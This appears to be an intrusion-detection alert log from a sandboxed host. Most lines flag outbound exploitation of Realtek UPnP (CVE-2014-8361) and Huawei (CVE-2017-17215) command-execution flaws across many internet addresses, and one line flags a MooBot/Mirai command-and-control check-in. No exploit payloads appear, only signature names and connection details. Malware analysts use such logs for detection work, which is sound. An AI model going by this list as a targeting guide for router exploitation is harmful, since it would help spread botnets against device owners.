                                      07/20/24-23:01:45.098864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25286452869192.168.2.23145.236.96.35
                                      07/20/24-23:01:51.021834TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615397852869192.168.2.23116.238.28.166
                                      07/20/24-23:01:04.996043TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5207652869192.168.2.23141.31.223.242
                                      07/20/24-23:01:43.994464TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3485052869192.168.2.23120.69.243.217
                                      07/20/24-23:01:00.634292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606637215192.168.2.2358.150.96.208
                                      07/20/24-23:01:04.085431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5317637215192.168.2.23157.209.153.245
                                      07/20/24-23:01:41.318733TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615984052869192.168.2.23125.128.111.151
                                      07/20/24-23:01:00.637175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5192637215192.168.2.2341.13.46.200
                                      07/20/24-23:01:51.360754TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3370452869192.168.2.23164.28.92.86
                                      07/20/24-23:01:47.995202TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616013052869192.168.2.2365.82.234.209
                                      07/20/24-23:01:51.161030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4595052869192.168.2.23218.205.210.219
                                      07/20/24-23:02:03.032025TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615386252869192.168.2.2363.42.182.153
                                      07/20/24-23:01:31.976984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4192437215192.168.2.23157.188.148.174
                                      07/20/24-23:01:11.636599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375437215192.168.2.2341.99.169.51
                                      07/20/24-23:01:20.131340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397637215192.168.2.2317.114.197.205
                                      07/20/24-23:01:52.144379TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25895252869192.168.2.23130.119.229.116
                                      07/20/24-23:01:53.654810TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4643452869192.168.2.2379.113.232.226
                                      07/20/24-23:01:00.637175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850237215192.168.2.23197.160.34.184
                                      07/20/24-23:01:11.636599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3878637215192.168.2.2325.61.31.63
                                      07/20/24-23:00:59.211046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4150237215192.168.2.23157.109.181.179
                                      07/20/24-23:01:24.944299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4233237215192.168.2.23157.87.66.233
                                      07/20/24-23:01:08.683684TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3407652869192.168.2.23206.248.87.37
                                      07/20/24-23:01:43.905912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3603452869192.168.2.23110.15.34.17
                                      07/20/24-23:02:00.062043TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4891652869192.168.2.23189.86.15.141
                                      07/20/24-23:01:02.320024TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5794652869192.168.2.23216.170.33.89
                                      07/20/24-23:01:59.707283TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613811852869192.168.2.2348.17.76.254
                                      07/20/24-23:01:04.049279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912437215192.168.2.23157.154.164.78
                                      07/20/24-23:01:31.333071TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3985852869192.168.2.23148.228.70.58
                                      07/20/24-23:01:04.040812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4888037215192.168.2.23157.163.80.204
                                      07/20/24-23:02:12.142469TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24609452869192.168.2.2372.122.103.48
                                      07/20/24-23:01:03.235405TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615854852869192.168.2.2337.189.124.248
                                      07/20/24-23:01:44.320661TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3423652869192.168.2.23218.234.180.136
                                      07/20/24-23:01:14.126869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798037215192.168.2.23197.142.66.141
                                      07/20/24-23:01:43.160906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6025052869192.168.2.23125.137.245.127
                                      07/20/24-23:01:24.071868TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5794252869192.168.2.2359.198.200.174
                                      07/20/24-23:01:44.589820TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25558452869192.168.2.23188.20.150.72
                                      07/20/24-23:01:21.915268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924037215192.168.2.23157.210.250.205
                                      07/20/24-23:01:06.975117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3294237215192.168.2.23157.197.13.210
                                      07/20/24-23:01:49.463055TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4749652869192.168.2.2318.7.171.33
                                      07/20/24-23:01:41.290281TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5499252869192.168.2.2380.7.39.33
                                      07/20/24-23:01:47.572503TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24503252869192.168.2.2386.216.107.76
                                      07/20/24-23:01:51.441890TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25068652869192.168.2.2363.196.31.124
                                      07/20/24-23:01:54.177524TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615615852869192.168.2.2369.193.122.132
                                      07/20/24-23:01:32.059767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4526837215192.168.2.23209.26.187.120
                                      07/20/24-23:01:20.591350TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24217252869192.168.2.234.129.239.131
                                      07/20/24-23:01:20.157619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5588237215192.168.2.23157.133.195.170
                                      07/20/24-23:01:42.751499TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24876252869192.168.2.2362.0.251.178
                                      07/20/24-23:01:44.713195TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615837652869192.168.2.23159.88.48.35
                                      07/20/24-23:01:06.973541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4900437215192.168.2.23197.9.136.124
                                      07/20/24-23:01:34.055714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649237215192.168.2.2341.168.246.30
                                      07/20/24-23:01:01.182969TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5976652869192.168.2.23133.66.91.121
                                      07/20/24-23:01:42.692691TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25904052869192.168.2.23170.207.21.198
                                      07/20/24-23:01:11.818830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5722037215192.168.2.23197.3.21.51
                                      07/20/24-23:01:53.132473TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614280252869192.168.2.2366.150.226.120
                                      07/20/24-23:01:58.202290TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614484852869192.168.2.23166.80.198.171
                                      07/20/24-23:02:01.796252TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614556452869192.168.2.23132.230.249.224
                                      07/20/24-23:01:20.593003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4401852869192.168.2.2351.20.137.216
                                      07/20/24-23:01:40.323034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5702637215192.168.2.23157.183.96.221
                                      07/20/24-23:01:02.729047TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4972252869192.168.2.23132.182.11.252
                                      07/20/24-23:01:42.854321TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4454452869192.168.2.2349.37.83.56
                                      07/20/24-23:00:56.851055TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)328482466192.168.2.2315.235.203.214
                                      07/20/24-23:01:34.045143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5960437215192.168.2.2341.36.189.61
                                      07/20/24-23:01:21.954501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5073637215192.168.2.2341.183.90.96
                                      07/20/24-23:01:24.060711TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4630252869192.168.2.23146.31.217.81
                                      07/20/24-23:01:25.994344TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613792452869192.168.2.23145.117.47.181
                                      07/20/24-23:01:51.400635TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613533052869192.168.2.23196.21.217.254
                                      07/20/24-23:01:42.006483TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24176652869192.168.2.2396.234.113.72
                                      07/20/24-23:01:01.868178TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4726252869192.168.2.23109.23.172.87
                                      07/20/24-23:01:41.263056TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615159652869192.168.2.23145.236.96.35
                                      07/20/24-23:01:11.631937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6047437215192.168.2.2341.171.182.143
                                      07/20/24-23:01:42.622797TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5047652869192.168.2.23173.58.223.243
                                      07/20/24-23:01:43.088724TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24246052869192.168.2.23174.130.13.191
                                      07/20/24-23:01:08.621030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4312252869192.168.2.2387.1.160.57
                                      07/20/24-23:01:31.317774TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4247852869192.168.2.23151.115.197.13
                                      07/20/24-23:01:59.104072TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4943252869192.168.2.23121.198.173.54
                                      07/20/24-23:01:44.144821TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615736652869192.168.2.231.111.156.136
                                      07/20/24-23:01:46.113314TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25571052869192.168.2.2374.205.109.96
                                      07/20/24-23:01:48.047800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5332252869192.168.2.2363.26.163.169
                                      07/20/24-23:01:51.244491TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4548252869192.168.2.23202.112.172.229
                                      07/20/24-23:01:47.433470TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4013652869192.168.2.2382.79.140.185
                                      07/20/24-23:01:45.513282TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4554852869192.168.2.23122.90.179.148
                                      07/20/24-23:01:41.974742TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26082452869192.168.2.23167.210.235.204
                                      07/20/24-23:01:42.935667TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615349052869192.168.2.2335.223.49.101
                                      07/20/24-23:01:08.619598TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24325852869192.168.2.2357.224.40.86
                                      07/20/24-23:01:26.138638TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4401452869192.168.2.23142.4.77.39
                                      07/20/24-23:01:10.698072TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4562252869192.168.2.23143.147.165.127
                                      07/20/24-23:01:44.440143TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5422852869192.168.2.23158.140.216.184
                                      07/20/24-23:01:49.463055TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25258252869192.168.2.23190.134.62.33
                                      07/20/24-23:01:27.650505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5172637215192.168.2.23157.174.105.214
                                      07/20/24-23:01:42.912947TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4476452869192.168.2.2399.220.126.213
                                      07/20/24-23:01:08.919725TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4599252869192.168.2.23199.61.238.254
                                      07/20/24-23:00:57.220949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313037215192.168.2.23157.110.226.143
                                      07/20/24-23:01:00.638305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291237215192.168.2.23156.90.210.240
                                      07/20/24-23:01:53.132473TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24360252869192.168.2.23110.244.30.5
                                      07/20/24-23:01:40.286738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4293837215192.168.2.23157.79.124.73
                                      07/20/24-23:01:48.216693TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4964452869192.168.2.2318.141.77.94
                                      07/20/24-23:01:12.853279TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4136052869192.168.2.23164.126.39.49
                                      07/20/24-23:01:53.429797TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4772052869192.168.2.23121.198.173.54
                                      07/20/24-23:01:58.717674TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6056652869192.168.2.23106.40.108.231
                                      07/20/24-23:00:59.196993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5991637215192.168.2.23157.129.228.162
                                      07/20/24-23:01:54.922661TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4673852869192.168.2.23166.80.198.171
                                      07/20/24-23:01:48.221889TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25948452869192.168.2.23221.223.71.222
                                      07/20/24-23:01:47.108019TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615811052869192.168.2.2393.255.151.238
                                      07/20/24-23:01:42.898615TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4725852869192.168.2.23208.122.170.150
                                      07/20/24-23:02:09.758048TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615330852869192.168.2.23164.236.61.179
                                      07/20/24-23:01:08.667963TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3961252869192.168.2.2344.181.179.103
                                      07/20/24-23:01:21.954501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4903037215192.168.2.23157.161.67.148
                                      07/20/24-23:02:03.245732TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613720452869192.168.2.2384.248.195.35
                                      07/20/24-23:01:47.006773TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23727652869192.168.2.2345.208.1.181
                                      07/20/24-23:01:03.115715TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616002052869192.168.2.23195.64.245.14
                                      07/20/24-23:01:08.597662TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3447252869192.168.2.2314.23.231.227
                                      07/20/24-23:01:44.203130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613424652869192.168.2.2346.50.151.45
                                      07/20/24-23:01:41.340201TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613791852869192.168.2.23220.210.17.223
                                      07/20/24-23:01:44.036421TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24908852869192.168.2.23218.231.87.4
                                      07/20/24-23:01:02.119631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859637215192.168.2.23197.102.112.63
                                      07/20/24-23:01:43.555329TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5800452869192.168.2.2345.244.207.174
                                      07/20/24-23:01:06.988055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5887037215192.168.2.23197.232.195.38
                                      07/20/24-23:01:02.340273TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614594852869192.168.2.23122.204.212.245
                                      07/20/24-23:01:31.977603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4455637215192.168.2.23197.102.132.79
                                      07/20/24-23:01:43.813001TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616019052869192.168.2.23112.206.146.120
                                      07/20/24-23:01:58.042671TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5560852869192.168.2.2354.153.180.221
                                      07/20/24-23:01:08.639622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5506252869192.168.2.2382.99.109.50
                                      07/20/24-23:01:42.651912TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23565452869192.168.2.2317.17.223.92
                                      07/20/24-23:01:43.028316TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616044052869192.168.2.23124.217.174.35
                                      07/20/24-23:01:26.222978TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613839252869192.168.2.239.241.118.240
                                      07/20/24-23:01:40.291616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3420837215192.168.2.23197.250.23.28
                                      07/20/24-23:01:26.111043TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3701652869192.168.2.23152.161.99.53
                                      07/20/24-23:01:34.044717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834237215192.168.2.2320.226.9.160
                                      07/20/24-23:01:04.447286TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4219452869192.168.2.23167.134.108.32
                                      07/20/24-23:01:11.630703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3321037215192.168.2.23111.178.38.86
                                      07/20/24-23:01:41.266946TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614250452869192.168.2.23190.248.52.121
                                      07/20/24-23:01:43.206220TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613714252869192.168.2.2343.216.241.103
                                      07/20/24-23:01:14.097135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503637215192.168.2.2341.142.235.21
                                      07/20/24-23:01:08.595072TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25737452869192.168.2.23162.117.132.232
                                      07/20/24-23:01:57.213768TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24311652869192.168.2.23112.142.124.162
                                      07/20/24-23:01:34.048825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140837215192.168.2.235.82.172.149
                                      07/20/24-23:01:45.092575TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614546852869192.168.2.23165.194.139.225
                                      07/20/24-23:01:08.659435TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25283852869192.168.2.234.194.116.48
                                      07/20/24-23:00:59.203960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269237215192.168.2.23197.241.179.191
                                      07/20/24-23:01:31.314147TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4716652869192.168.2.23136.18.44.19
                                      07/20/24-23:01:42.474339TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615125252869192.168.2.2341.250.44.72
                                      07/20/24-23:01:12.807585TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4205252869192.168.2.2372.182.219.141
                                      07/20/24-23:01:45.519802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4096652869192.168.2.2352.182.197.150
                                      07/20/24-23:01:42.442442TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5582852869192.168.2.23171.82.217.243
                                      07/20/24-23:01:31.320338TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24189852869192.168.2.23199.241.141.173
                                      07/20/24-23:01:46.293475TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4805052869192.168.2.2337.140.130.170
                                      07/20/24-23:01:00.639011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3830437215192.168.2.23197.92.201.180
                                      07/20/24-23:01:00.645186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5059637215192.168.2.2341.212.198.90
                                      07/20/24-23:01:52.914137TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23497052869192.168.2.2337.158.125.18
                                      07/20/24-23:01:26.607132TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4643452869192.168.2.232.17.25.163
                                      07/20/24-23:01:31.326982TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24874652869192.168.2.23120.48.178.89
                                      07/20/24-23:01:24.898476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3332637215192.168.2.23197.164.160.245
                                      07/20/24-23:01:41.286262TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3293052869192.168.2.23181.147.220.98
                                      07/20/24-23:01:50.147840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3452252869192.168.2.23191.136.148.80
                                      07/20/24-23:01:05.049337TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5695252869192.168.2.235.53.123.92
                                      07/20/24-23:02:06.553447TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614881452869192.168.2.2358.121.119.159
                                      07/20/24-23:01:41.303455TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614229252869192.168.2.23182.86.228.100
                                      07/20/24-23:01:42.571884TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5006252869192.168.2.23106.219.50.159
                                      07/20/24-23:01:44.464382TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6051052869192.168.2.23141.54.172.151
                                      07/20/24-23:01:44.550538TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23838452869192.168.2.23198.213.74.132
                                      07/20/24-23:02:12.234515TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5538452869192.168.2.23202.77.166.232
                                      07/20/24-23:00:59.185032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090837215192.168.2.2341.96.218.16
                                      07/20/24-23:01:43.845332TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3689652869192.168.2.23137.51.1.150
                                      07/20/24-23:01:01.846382TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613360052869192.168.2.23213.241.106.75
                                      07/20/24-23:02:04.525064TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613841252869192.168.2.2372.19.23.60
                                      07/20/24-23:02:01.357047TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3479252869192.168.2.23164.226.47.144
                                      07/20/24-23:01:01.788008TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614107852869192.168.2.23173.195.200.196
                                      07/20/24-23:01:52.487978TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4033052869192.168.2.23182.62.146.57
                                      07/20/24-23:01:57.082339TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613607452869192.168.2.23177.72.81.243
                                      07/20/24-23:01:02.742663TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6001052869192.168.2.23196.57.233.80
                                      07/20/24-23:01:48.288217TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24875652869192.168.2.2381.22.157.142
                                      07/20/24-23:01:11.631728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3757237215192.168.2.23197.53.147.58
                                      07/20/24-23:01:27.666100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5618837215192.168.2.23204.242.74.211
                                      07/20/24-23:01:27.749737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4474837215192.168.2.2386.228.82.71
                                      07/20/24-23:01:44.706302TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613953452869192.168.2.23154.31.9.47
                                      07/20/24-23:01:48.083998TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616071852869192.168.2.2363.248.77.62
                                      07/20/24-23:02:08.781934TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614532652869192.168.2.2370.23.48.212
                                      07/20/24-23:01:51.944006TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24339652869192.168.2.23182.158.136.187
